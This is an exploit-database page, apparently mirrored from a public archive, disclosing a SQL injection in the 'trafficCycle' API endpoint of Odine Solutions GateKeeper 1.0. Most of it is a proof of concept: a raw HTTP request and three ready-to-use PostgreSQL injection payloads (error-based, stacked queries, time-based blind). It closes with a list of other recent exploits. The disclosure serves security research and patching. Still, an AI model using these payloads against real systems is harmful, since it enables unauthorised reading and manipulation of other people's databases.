Odine solutions gatekeeper 1.0 trafficcycle sql injection Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-10-06 | Type : webapps | Platform : multiple
This exploit / vulnerability Odine solutions gatekeeper 1.0 trafficcycle sql injection is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection
# Date: 05.10.2021
# Exploit Author: Emel Basayar
# Vendor: Odine Solutions - odinesolutions.com
# Vendor Homepage: https://odinesolutions.com/software/gatekeeper-simbox-antifraud/
# Version: 1.0
# Category: Webapps
# Tested on: Ubuntu 18 TLS
# Description : The vulnerability allows an attacker to inject sql commands from search section with 'trafficCycle' parameter.
# This vulnerability was discovered during the penetration testing and the vulnerability was fixed.
====================================================

# PoC : SQLi :

GET /rass/api/v1/trafficCycle/98 HTTP/1.1
Host: 192.168.1.25
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Bearer xm38HruG-htx0jNuM-l9UBCkoz-G7RigZvx
Origin: https://192.168.1.25
Connection: close
Referer: https://192.168.1.25

Parameter: #1* (URI)
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 5042=CAST((CHR(113)||CHR(118)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (5042=5042) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(98)||CHR(120)||CHR(113)) AS NUMERIC)-- yrdB

Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98';SELECT PG_SLEEP(5)--

Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 9405=(SELECT 9405 FROM PG_SLEEP(5))-- PasC
---
web application technology: Nginx
back-end DBMS: PostgreSQL

====================================================

Odine solutions gatekeeper 1.0 trafficcycle sql injection


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Odine solutions gatekeeper 1.0 trafficcycle sql injection Vulnerability / Exploit